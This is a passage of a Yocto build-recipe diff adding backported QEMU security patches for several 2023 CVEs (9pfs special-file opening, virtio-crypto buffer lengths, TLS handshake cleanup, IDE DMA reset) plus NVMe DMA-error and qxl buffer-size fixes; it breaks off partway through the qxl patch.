4Subject: [PATCH] 9pfs: prevent opening special files (CVE-2023-2861)
5
6The 9p protocol does not specifically define how server shall behave when
7client tries to open a special file, however from security POV it does
8make sense for 9p server to prohibit opening any special file on host side
9in general. A sane Linux 9p client for instance would never attempt to
10open a special file on host side, it would always handle those exclusively
11on its guest side. A malicious client however could potentially escape
12from the exported 9p tree by creating and opening a device file on host
13side.
14
15With QEMU this could only be exploited in the following unsafe setups:
16
17 - Running QEMU binary as root AND 9p 'local' fs driver AND 'passthrough'
18 security model.
19
20or
21
22 - Using 9p 'proxy' fs driver (which is running its helper daemon as
23 root).
24
25These setups were already discouraged for safety reasons before,
26however for obvious reasons we are now tightening behaviour on this.
27
28Fixes: CVE-2023-2861
29Reported-by: Yanwu Shen <ywsPlz@gmail.com>
30Reported-by: Jietao Xiao <shawtao1125@gmail.com>
31Reported-by: Jinku Li <jkli@xidian.edu.cn>
32Reported-by: Wenbo Shen <shenwenbo@zju.edu.cn>
33Signed-off-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
34Reviewed-by: Greg Kurz <groug@kaod.org>
35Reviewed-by: Michael Tokarev <mjt@tls.msk.ru>
36Message-Id: <E1q6w7r-0000Q0-NM@lizzy.crudebyte.com>
37
38Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/f6b0de53fb87ddefed348a39284c8e2f28dc4eda]
39CVE: CVE-2023-2861
40Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
41---
42 fsdev/virtfs-proxy-helper.c | 27 +++++++++++++++++++++++--
43 hw/9pfs/9p-util.h | 40 +++++++++++++++++++++++++++++++++++++
44 2 files changed, 65 insertions(+), 2 deletions(-)
45
46diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
47index 6f132c5f..300c9765 100644
48--- a/fsdev/virtfs-proxy-helper.c
49+++ b/fsdev/virtfs-proxy-helper.c
50@@ -26,6 +26,7 @@
51 #include "qemu/xattr.h"
52 #include "9p-iov-marshal.h"
53 #include "hw/9pfs/9p-proxy.h"
54+#include "hw/9pfs/9p-util.h"
55 #include "fsdev/9p-iov-marshal.h"
56
57 #define PROGNAME "virtfs-proxy-helper"
58@@ -350,6 +351,28 @@ static void resetugid(int suid, int sgid)
59 }
60 }
61
62+/*
63+ * Open regular file or directory. Attempts to open any special file are
64+ * rejected.
65+ *
66+ * returns file descriptor or -1 on error
67+ */
68+static int open_regular(const char *pathname, int flags, mode_t mode)
69+{
70+ int fd;
71+
72+ fd = open(pathname, flags, mode);
73+ if (fd < 0) {
74+ return fd;
75+ }
76+
77+ if (close_if_special_file(fd) < 0) {
78+ return -1;
79+ }
80+
81+ return fd;
82+}
83+
84 /*
85 * send response in two parts
86 * 1) ProxyHeader
87@@ -694,7 +717,7 @@ static int do_create(struct iovec *iovec)
88 if (ret < 0) {
89 goto unmarshal_err_out;
90 }
91- ret = open(path.data, flags, mode);
92+ ret = open_regular(path.data, flags, mode);
93 if (ret < 0) {
94 ret = -errno;
95 }
96@@ -719,7 +742,7 @@ static int do_open(struct iovec *iovec)
97 if (ret < 0) {
98 goto err_out;
99 }
100- ret = open(path.data, flags);
101+ ret = open_regular(path.data, flags, 0);
102 if (ret < 0) {
103 ret = -errno;
104 }
105diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
106index 546f46dc..79fdd2a3 100644
107--- a/hw/9pfs/9p-util.h
108+++ b/hw/9pfs/9p-util.h
109@@ -13,12 +13,16 @@
110 #ifndef QEMU_9P_UTIL_H
111 #define QEMU_9P_UTIL_H
112
113+#include "qemu/error-report.h"
114+
115 #ifdef O_PATH
116 #define O_PATH_9P_UTIL O_PATH
117 #else
118 #define O_PATH_9P_UTIL 0
119 #endif
120
121+#define qemu_fstat fstat
122+
123 static inline void close_preserve_errno(int fd)
124 {
125 int serrno = errno;
126@@ -26,6 +30,38 @@ static inline void close_preserve_errno(int fd)
127 errno = serrno;
128 }
129
130+/**
131+ * close_if_special_file() - Close @fd if neither regular file nor directory.
132+ *
133+ * @fd: file descriptor of open file
134+ * Return: 0 on regular file or directory, -1 otherwise
135+ *
136+ * CVE-2023-2861: Prohibit opening any special file directly on host
137+ * (especially device files), as a compromised client could potentially gain
138+ * access outside exported tree under certain, unsafe setups. We expect
139+ * client to handle I/O on special files exclusively on guest side.
140+ */
141+static inline int close_if_special_file(int fd)
142+{
143+ struct stat stbuf;
144+
145+ if (qemu_fstat(fd, &stbuf) < 0) {
146+ close_preserve_errno(fd);
147+ return -1;
148+ }
149+ if (!S_ISREG(stbuf.st_mode) && !S_ISDIR(stbuf.st_mode)) {
150+ error_report_once(
151+ "9p: broken or compromised client detected; attempt to open "
152+ "special file (i.e. neither regular file, nor directory)"
153+ );
154+ close(fd);
155+ errno = ENXIO;
156+ return -1;
157+ }
158+
159+ return 0;
160+}
161+
162 static inline int openat_dir(int dirfd, const char *name)
163 {
164 return openat(dirfd, name,
165@@ -56,6 +92,10 @@ again:
166 return -1;
167 }
168
169+ if (close_if_special_file(fd) < 0) {
170+ return -1;
171+ }
172+
173 serrno = errno;
174 /* O_NONBLOCK was only needed to open the file. Let's drop it. We don't
175 * do that with O_PATH since fcntl(F_SETFL) isn't supported, and openat()
176--
1772.25.1
178
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch
new file mode 100644
index 0000000000..7144bdca46
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch
@@ -0,0 +1,49 @@
1From 9d38a8434721a6479fe03fb5afb150ca793d3980 Mon Sep 17 00:00:00 2001
2From: zhenwei pi <pizhenwei@bytedance.com>
3Date: Thu, 3 Aug 2023 10:43:13 +0800
4Subject: [PATCH] virtio-crypto: verify src&dst buffer length for sym request
5
6For symmetric algorithms, the length of ciphertext must be as same
7as the plaintext.
8The missing verification of the src_len and the dst_len in
9virtio_crypto_sym_op_helper() may lead buffer overflow/divulged.
10
11This patch is originally written by Yiming Tao for QEMU-SECURITY,
12resend it(a few changes of error message) in qemu-devel.
13
14Fixes: CVE-2023-3180
15Fixes: 04b9b37edda("virtio-crypto: add data queue processing handler")
16Cc: Gonglei <arei.gonglei@huawei.com>
17Cc: Mauro Matteo Cascella <mcascell@redhat.com>
18Cc: Yiming Tao <taoym@zju.edu.cn>
19Signed-off-by: zhenwei pi <pizhenwei@bytedance.com>
20Message-Id: <20230803024314.29962-2-pizhenwei@bytedance.com>
21Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
22Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
23
24Upstream-Status: Backport from [https://gitlab.com/qemu-project/qemu/-/commit/9d38a8434721a6479fe03fb5afb150ca793d3980]
25CVE: CVE-2023-3180
26Signed-off-by: Ashish Sharma <asharma@mvista.com>
27
28 hw/virtio/virtio-crypto.c | 5 +++++
29 1 file changed, 5 insertions(+)
30
31diff --git a/hw/virtio/virtio-crypto.c b/hw/virtio/virtio-crypto.c
32index 44faf5a522b..13aec771e11 100644
33--- a/hw/virtio/virtio-crypto.c
34+++ b/hw/virtio/virtio-crypto.c
35@@ -634,6 +634,11 @@ virtio_crypto_sym_op_helper(VirtIODevice *vdev,
36 return NULL;
37 }
38
39+ if (unlikely(src_len != dst_len)) {
40+ virtio_error(vdev, "sym request src len is different from dst len");
41+ return NULL;
42+ }
43+
44 max_len = (uint64_t)iv_len + aad_len + src_len + dst_len + hash_result_len;
45 if (unlikely(max_len > vcrypto->conf.max_size)) {
46 virtio_error(vdev, "virtio-crypto too big length");
47--
48GitLab
49
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch
new file mode 100644
index 0000000000..2942e84cac
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch
@@ -0,0 +1,87 @@
1From 10be627d2b5ec2d6b3dce045144aa739eef678b4 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Daniel=20P=2E=20Berrang=C3=A9?= <berrange@redhat.com>
3Date: Tue, 20 Jun 2023 09:45:34 +0100
4Subject: [PATCH] io: remove io watch if TLS channel is closed during handshake
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9The TLS handshake make take some time to complete, during which time an
10I/O watch might be registered with the main loop. If the owner of the
11I/O channel invokes qio_channel_close() while the handshake is waiting
12to continue the I/O watch must be removed. Failing to remove it will
13later trigger the completion callback which the owner is not expecting
14to receive. In the case of the VNC server, this results in a SEGV as
15vnc_disconnect_start() tries to shutdown a client connection that is
16already gone / NULL.
17
18CVE-2023-3354
19Reported-by: jiangyegen <jiangyegen@huawei.com>
20Signed-off-by: Daniel P. Berrangé <berrange@redhat.com>
21
22Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/10be627d2b5ec2d6b3dce045144aa739eef678b4]
23CVE: CVE-2023-3354
24Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
25---
26 include/io/channel-tls.h | 1 +
27 io/channel-tls.c | 18 ++++++++++++------
28 2 files changed, 13 insertions(+), 6 deletions(-)
29
30diff --git a/include/io/channel-tls.h b/include/io/channel-tls.h
31index fdbdf12f..e49e2831 100644
32--- a/include/io/channel-tls.h
33+++ b/include/io/channel-tls.h
34@@ -49,6 +49,7 @@ struct QIOChannelTLS {
35 QIOChannel *master;
36 QCryptoTLSSession *session;
37 QIOChannelShutdown shutdown;
38+ guint hs_ioc_tag;
39 };
40
41 /**
42diff --git a/io/channel-tls.c b/io/channel-tls.c
43index 7ec8ceff..8b32fbde 100644
44--- a/io/channel-tls.c
45+++ b/io/channel-tls.c
46@@ -194,12 +194,13 @@ static void qio_channel_tls_handshake_task(QIOChannelTLS *ioc,
47 }
48
49 trace_qio_channel_tls_handshake_pending(ioc, status);
50- qio_channel_add_watch_full(ioc->master,
51- condition,
52- qio_channel_tls_handshake_io,
53- data,
54- NULL,
55- context);
56+ ioc->hs_ioc_tag =
57+ qio_channel_add_watch_full(ioc->master,
58+ condition,
59+ qio_channel_tls_handshake_io,
60+ data,
61+ NULL,
62+ context);
63 }
64 }
65
66@@ -214,6 +215,7 @@ static gboolean qio_channel_tls_handshake_io(QIOChannel *ioc,
67 QIOChannelTLS *tioc = QIO_CHANNEL_TLS(
68 qio_task_get_source(task));
69
70+ tioc->hs_ioc_tag = 0;
71 g_free(data);
72 qio_channel_tls_handshake_task(tioc, task, context);
73
74@@ -371,6 +373,10 @@ static int qio_channel_tls_close(QIOChannel *ioc,
75 {
76 QIOChannelTLS *tioc = QIO_CHANNEL_TLS(ioc);
77
78+ if (tioc->hs_ioc_tag) {
79+ g_clear_handle_id(&tioc->hs_ioc_tag, g_source_remove);
80+ }
81+
82 return qio_channel_close(tioc->master, errp);
83 }
84
85--
862.25.1
87
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch
new file mode 100644
index 0000000000..db02210fa4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch
@@ -0,0 +1,114 @@
1From 7d7512019fc40c577e2bdd61f114f31a9eb84a8e Mon Sep 17 00:00:00 2001
2From: Fiona Ebner <f.ebner@proxmox.com>
3Date: Wed, 6 Sep 2023 15:09:21 +0200
4Subject: [PATCH] hw/ide: reset: cancel async DMA operation before resetting
5 state
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10If there is a pending DMA operation during ide_bus_reset(), the fact
11that the IDEState is already reset before the operation is canceled
12can be problematic. In particular, ide_dma_cb() might be called and
13then use the reset IDEState which contains the signature after the
14reset. When used to construct the IO operation this leads to
15ide_get_sector() returning 0 and nsector being 1. This is particularly
16bad, because a write command will thus destroy the first sector which
17often contains a partition table or similar.
18
19Traces showing the unsolicited write happening with IDEState
200x5595af6949d0 being used after reset:
21
22> ahci_port_write ahci(0x5595af6923f0)[0]: port write [reg:PxSCTL] @ 0x2c: 0x00000300
23> ahci_reset_port ahci(0x5595af6923f0)[0]: reset port
24> ide_reset IDEstate 0x5595af6949d0
25> ide_reset IDEstate 0x5595af694da8
26> ide_bus_reset_aio aio_cancel
27> dma_aio_cancel dbs=0x7f64600089a0
28> dma_blk_cb dbs=0x7f64600089a0 ret=0
29> dma_complete dbs=0x7f64600089a0 ret=0 cb=0x5595acd40b30
30> ahci_populate_sglist ahci(0x5595af6923f0)[0]
31> ahci_dma_prepare_buf ahci(0x5595af6923f0)[0]: prepare buf limit=512 prepared=512
32> ide_dma_cb IDEState 0x5595af6949d0; sector_num=0 n=1 cmd=DMA WRITE
33> dma_blk_io dbs=0x7f6420802010 bs=0x5595ae2c6c30 offset=0 to_dev=1
34> dma_blk_cb dbs=0x7f6420802010 ret=0
35
36> (gdb) p *qiov
37> $11 = {iov = 0x7f647c76d840, niov = 1, {{nalloc = 1, local_iov = {iov_base = 0x0,
38> iov_len = 512}}, {__pad = "\001\000\000\000\000\000\000\000\000\000\000",
39> size = 512}}}
40> (gdb) bt
41> #0 blk_aio_pwritev (blk=0x5595ae2c6c30, offset=0, qiov=0x7f6420802070, flags=0,
42> cb=0x5595ace6f0b0 <dma_blk_cb>, opaque=0x7f6420802010)
43> at ../block/block-backend.c:1682
44> #1 0x00005595ace6f185 in dma_blk_cb (opaque=0x7f6420802010, ret=<optimized out>)
45> at ../softmmu/dma-helpers.c:179
46> #2 0x00005595ace6f778 in dma_blk_io (ctx=0x5595ae0609f0,
47> sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
48> io_func=io_func@entry=0x5595ace6ee30 <dma_blk_write_io_func>,
49> io_func_opaque=io_func_opaque@entry=0x5595ae2c6c30,
50> cb=0x5595acd40b30 <ide_dma_cb>, opaque=0x5595af6949d0,
51> dir=DMA_DIRECTION_TO_DEVICE) at ../softmmu/dma-helpers.c:244
52> #3 0x00005595ace6f90a in dma_blk_write (blk=0x5595ae2c6c30,
53> sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
54> cb=cb@entry=0x5595acd40b30 <ide_dma_cb>, opaque=opaque@entry=0x5595af6949d0)
55> at ../softmmu/dma-helpers.c:280
56> #4 0x00005595acd40e18 in ide_dma_cb (opaque=0x5595af6949d0, ret=<optimized out>)
57> at ../hw/ide/core.c:953
58> #5 0x00005595ace6f319 in dma_complete (ret=0, dbs=0x7f64600089a0)
59> at ../softmmu/dma-helpers.c:107
60> #6 dma_blk_cb (opaque=0x7f64600089a0, ret=0) at ../softmmu/dma-helpers.c:127
61> #7 0x00005595ad12227d in blk_aio_complete (acb=0x7f6460005b10)
62> at ../block/block-backend.c:1527
63> #8 blk_aio_complete (acb=0x7f6460005b10) at ../block/block-backend.c:1524
64> #9 blk_aio_write_entry (opaque=0x7f6460005b10) at ../block/block-backend.c:1594
65> #10 0x00005595ad258cfb in coroutine_trampoline (i0=<optimized out>,
66> i1=<optimized out>) at ../util/coroutine-ucontext.c:177
67
68Signed-off-by: Fiona Ebner <f.ebner@proxmox.com>
69Reviewed-by: Philippe Mathieu-Daudé <philmd@linaro.org>
70Tested-by: simon.rowe@nutanix.com
71Message-ID: <20230906130922.142845-1-f.ebner@proxmox.com>
72Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
73
74Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/7d7512019fc40c577e2bdd61f114f31a9eb84a8e]
75CVE: CVE-2023-5088
76Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
77---
78 hw/ide/core.c | 14 +++++++-------
79 1 file changed, 7 insertions(+), 7 deletions(-)
80
81diff --git a/hw/ide/core.c b/hw/ide/core.c
82index b5e0dcd29b2..63ba665f3d2 100644
83--- a/hw/ide/core.c
84+++ b/hw/ide/core.c
85@@ -2515,19 +2515,19 @@ static void ide_dummy_transfer_stop(IDEState *s)
86
87 void ide_bus_reset(IDEBus *bus)
88 {
89- bus->unit = 0;
90- bus->cmd = 0;
91- ide_reset(&bus->ifs[0]);
92- ide_reset(&bus->ifs[1]);
93- ide_clear_hob(bus);
94-
95- /* pending async DMA */
96+ /* pending async DMA - needs the IDEState before it is reset */
97 if (bus->dma->aiocb) {
98 trace_ide_bus_reset_aio();
99 blk_aio_cancel(bus->dma->aiocb);
100 bus->dma->aiocb = NULL;
101 }
102
103+ bus->unit = 0;
104+ bus->cmd = 0;
105+ ide_reset(&bus->ifs[0]);
106+ ide_reset(&bus->ifs[1]);
107+ ide_clear_hob(bus);
108+
109 /* reset dma provider too */
110 if (bus->dma->ops->reset) {
111 bus->dma->ops->reset(bus->dma);
112--
113GitLab
114
diff --git a/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch
new file mode 100644
index 0000000000..0fdae8351a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch
@@ -0,0 +1,146 @@
1From ea2a7c7676d8eb9d1458eaa4b717df46782dcb3a Mon Sep 17 00:00:00 2001
2From: Gaurav Gupta <gauragup@cisco.com>
3Date: Wed, 29 Mar 2023 14:07:17 -0700
4Subject: [PATCH 2/2] hw/block/nvme: handle dma errors
5
6Handling DMA errors gracefully is required for the device to pass the
7block/011 test ("disable PCI device while doing I/O") in the blktests
8suite.
9
10With this patch the device sets the Controller Fatal Status bit in the
11CSTS register when failing to read from a submission queue or writing to
12a completion queue; expecting the host to reset the controller.
13
14If DMA errors occur at any other point in the execution of the command
15(say, while mapping the PRPs), the command is aborted with a Data
16Transfer Error status code.
17
18Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
19Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
20---
21 hw/block/nvme.c | 41 +++++++++++++++++++++++++++++++----------
22 hw/block/trace-events | 3 +++
23 2 files changed, 34 insertions(+), 10 deletions(-)
24
25diff --git a/hw/block/nvme.c b/hw/block/nvme.c
26index e6f24a6..bda446d 100644
27--- a/hw/block/nvme.c
28+++ b/hw/block/nvme.c
29@@ -60,14 +60,14 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
30 return addr >= low && addr < hi;
31 }
32
33-static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
34+static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
35 {
36 if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
37 memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
38- return;
39+ return 0;
40 }
41
42- pci_dma_read(&n->parent_obj, addr, buf, size);
43+ return pci_dma_read(&n->parent_obj, addr, buf, size);
44 }
45
46 static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
47@@ -152,6 +152,7 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
48 hwaddr trans_len = n->page_size - (prp1 % n->page_size);
49 trans_len = MIN(len, trans_len);
50 int num_prps = (len >> n->page_bits) + 1;
51+ int ret;
52
53 if (unlikely(!prp1)) {
54 trace_nvme_err_invalid_prp();
55@@ -178,7 +179,11 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
56
57 nents = (len + n->page_size - 1) >> n->page_bits;
58 prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
59- nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
60+ ret = nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
61+ if (ret) {
62+ trace_pci_nvme_err_addr_read(prp2);
63+ return NVME_DATA_TRAS_ERROR;
64+ }
65 while (len != 0) {
66 uint64_t prp_ent = le64_to_cpu(prp_list[i]);
67
68@@ -191,8 +196,12 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
69 i = 0;
70 nents = (len + n->page_size - 1) >> n->page_bits;
71 prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
72- nvme_addr_read(n, prp_ent, (void *)prp_list,
73- prp_trans);
74+ ret = nvme_addr_read(n, prp_ent, (void *)prp_list,
75+ prp_trans);
76+ if (ret) {
77+ trace_pci_nvme_err_addr_read(prp_ent);
78+ return NVME_DATA_TRAS_ERROR;
79+ }
80 prp_ent = le64_to_cpu(prp_list[i]);
81 }
82
83@@ -286,6 +295,7 @@ static void nvme_post_cqes(void *opaque)
84 NvmeCQueue *cq = opaque;
85 NvmeCtrl *n = cq->ctrl;
86 NvmeRequest *req, *next;
87+ int ret;
88
89 QTAILQ_FOREACH_SAFE(req, &cq->req_list, entry, next) {
90 NvmeSQueue *sq;
91@@ -295,15 +305,21 @@ static void nvme_post_cqes(void *opaque)
92 break;
93 }
94
95- QTAILQ_REMOVE(&cq->req_list, req, entry);
96 sq = req->sq;
97 req->cqe.status = cpu_to_le16((req->status << 1) | cq->phase);
98 req->cqe.sq_id = cpu_to_le16(sq->sqid);
99 req->cqe.sq_head = cpu_to_le16(sq->head);
100 addr = cq->dma_addr + cq->tail * n->cqe_size;
101+ ret = pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
102+ sizeof(req->cqe));
103+ if (ret) {
104+ trace_pci_nvme_err_addr_write(addr);
105+ trace_pci_nvme_err_cfs();
106+ n->bar.csts = NVME_CSTS_FAILED;
107+ break;
108+ }
109+ QTAILQ_REMOVE(&cq->req_list, req, entry);
110 nvme_inc_cq_tail(cq);
111- pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
112- sizeof(req->cqe));
113 QTAILQ_INSERT_TAIL(&sq->req_list, req, entry);
114 }
115 if (cq->tail != cq->head) {
116@@ -888,7 +904,12 @@ static void nvme_process_sq(void *opaque)
117
118 while (!(nvme_sq_empty(sq) || QTAILQ_EMPTY(&sq->req_list))) {
119 addr = sq->dma_addr + sq->head * n->sqe_size;
120- nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd));
121+ if (nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd))) {
122+ trace_pci_nvme_err_addr_read(addr);
123+ trace_pci_nvme_err_cfs();
124+ n->bar.csts = NVME_CSTS_FAILED;
125+ break;
126+ }
127 nvme_inc_sq_head(sq);
128
129 req = QTAILQ_FIRST(&sq->req_list);
130diff --git a/hw/block/trace-events b/hw/block/trace-events
131index c03e80c..4e4ad4e 100644
132--- a/hw/block/trace-events
133+++ b/hw/block/trace-events
134@@ -60,6 +60,9 @@ nvme_mmio_shutdown_set(void) "shutdown bit set"
135 nvme_mmio_shutdown_cleared(void) "shutdown bit cleared"
136
137 # nvme traces for error conditions
138+pci_nvme_err_addr_read(uint64_t addr) "addr 0x%"PRIx64""
139+pci_nvme_err_addr_write(uint64_t addr) "addr 0x%"PRIx64""
140+pci_nvme_err_cfs(void) "controller fatal status"
141 nvme_err_invalid_dma(void) "PRP/SGL is too small for transfer size"
142 nvme_err_invalid_prplist_ent(uint64_t prplist) "PRP list entry is null or not page aligned: 0x%"PRIx64""
143 nvme_err_invalid_prp2_align(uint64_t prp2) "PRP2 is not page aligned: 0x%"PRIx64""
144--
1451.8.3.1
146
diff --git a/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch
new file mode 100644
index 0000000000..66ada52efb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch
@@ -0,0 +1,55 @@
1From 55428706d5b0b8889b8e009eac77137bb556a4f0 Mon Sep 17 00:00:00 2001
2From: Klaus Jensen <k.jensen@samsung.com>
3Date: Tue, 9 Jun 2020 21:03:17 +0200
4Subject: [PATCH 1/2] hw/block/nvme: refactor nvme_addr_read
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Pull the controller memory buffer check to its own function. The check
10will be used on its own in later patches.
11
12Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
13Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
14Reviewed-by: Maxim Levitsky <mlevitsk@redhat.com>
15Reviewed-by: Keith Busch <kbusch@kernel.org>
16Message-Id: <20200609190333.59390-7-its@irrelevant.dk>
17Signed-off-by: Kevin Wolf <kwolf@redhat.com>
18---
19 hw/block/nvme.c | 16 ++++++++++++----
20 1 file changed, 12 insertions(+), 4 deletions(-)
21
22diff --git a/hw/block/nvme.c b/hw/block/nvme.c
23index 12d8254..e6f24a6 100644
24--- a/hw/block/nvme.c
25+++ b/hw/block/nvme.c
26@@ -52,14 +52,22 @@
27
28 static void nvme_process_sq(void *opaque);
29
30+static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
31+{
32+ hwaddr low = n->ctrl_mem.addr;
33+ hwaddr hi = n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size);
34+
35+ return addr >= low && addr < hi;
36+}
37+
38 static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
39 {
40- if (n->cmbsz && addr >= n->ctrl_mem.addr &&
41- addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size))) {
42+ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
43 memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
44- } else {
45- pci_dma_read(&n->parent_obj, addr, buf, size);
46+ return;
47 }
48+
49+ pci_dma_read(&n->parent_obj, addr, buf, size);
50 }
51
52 static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
53--
541.8.3.1
55
diff --git a/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
new file mode 100644
index 0000000000..f380be486c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
@@ -0,0 +1,236 @@
1From 5a44a01c9eca6507be45d107c27377a3e8d0ee8c Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
3Date: Mon, 28 Nov 2022 21:27:39 +0100
4Subject: [PATCH] hw/display/qxl: Pass requested buffer size to qxl_phys2virt()
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Currently qxl_phys2virt() doesn't check for buffer overrun.
10In order to do so in the next commit, pass the buffer size
11as argument.
12
13For QXLCursor in qxl_render_cursor() -> qxl_cursor() we
14verify the size of the chunked data ahead, checking we can
15access 'sizeof(QXLCursor) + chunk->data_size' bytes.
16Since in the SPICE_CURSOR_TYPE_MONO case the cursor is
17assumed to fit in one chunk, no change are required.
18In SPICE_CURSOR_TYPE_ALPHA the ahead read is handled in
19qxl_unpack_chunks().
20
21Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
22Acked-by: Gerd Hoffmann <kraxel@redhat.com>
23Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
24Message-Id: <20221128202741.4945-4-philmd@linaro.org>
25
26Backport and rebase patch to fix compile error which imported by CVE-2022-4144.patch:
27
28/qxl.c: In function 'qxl_phys2virt':
29| /home/hitendra/work/yocto-work/cgx-data/dunfell-3.1/x86-generic-64-5.4-3.1-cgx/project/tmp/work/i586-montavistamllib32-linux/lib32-qemu/4.2.0-r0.8/qemu-4.2.0/hw/display/qxl.c:1508:67: error: 'size' undeclared (first use in this function); did you mean 'gsize'?
30| 1508 | if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
31| | ^~~~
32| | gsize
33
34Upstream-Status: Backport [https://github.com/qemu/qemu/commit/61c34fc && https://gitlab.com/qemu-project/qemu/-/commit/8efec0ef8bbc1e75a7ebf6e325a35806ece9b39f]
35
36Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
37---
38 hw/display/qxl-logger.c | 22 +++++++++++++++++++---
39 hw/display/qxl-render.c | 20 ++++++++++++++++----
40 hw/display/qxl.c | 17 +++++++++++------
41 hw/display/qxl.h | 3 ++-
42 4 files changed, 48 insertions(+), 14 deletions(-)
43
44diff --git a/hw/display/qxl-logger.c b/hw/display/qxl-logger.c
45index 2ec6d8fa..031ddfec 100644
46--- a/hw/display/qxl-logger.c
47+++ b/hw/display/qxl-logger.c
48@@ -106,7 +106,7 @@ static int qxl_log_image(PCIQXLDevice *qxl, QXLPHYSICAL addr, int group_id)
49 QXLImage *image;
50 QXLImageDescriptor *desc;
51
52- image = qxl_phys2virt(qxl, addr, group_id);
53+ image = qxl_phys2virt(qxl, addr, group_id, sizeof(QXLImage));
54 if (!image) {
55 return 1;
56 }
57@@ -216,7 +216,8 @@ int qxl_log_cmd_cursor(PCIQXLDevice *qxl, QXLCursorCmd *cmd, int group_id)
58 cmd->u.set.position.y,
59 cmd->u.set.visible ? "yes" : "no",
60 cmd->u.set.shape);
61- cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id);
62+ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id,
63+ sizeof(QXLCursor));
64 if (!cursor) {
65 return 1;
66 }
67@@ -238,6 +239,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
68 {
69 bool compat = ext->flags & QXL_COMMAND_FLAG_COMPAT;
70 void *data;
71+ size_t datasz;
72 int ret;
73
74 if (!qxl->cmdlog) {
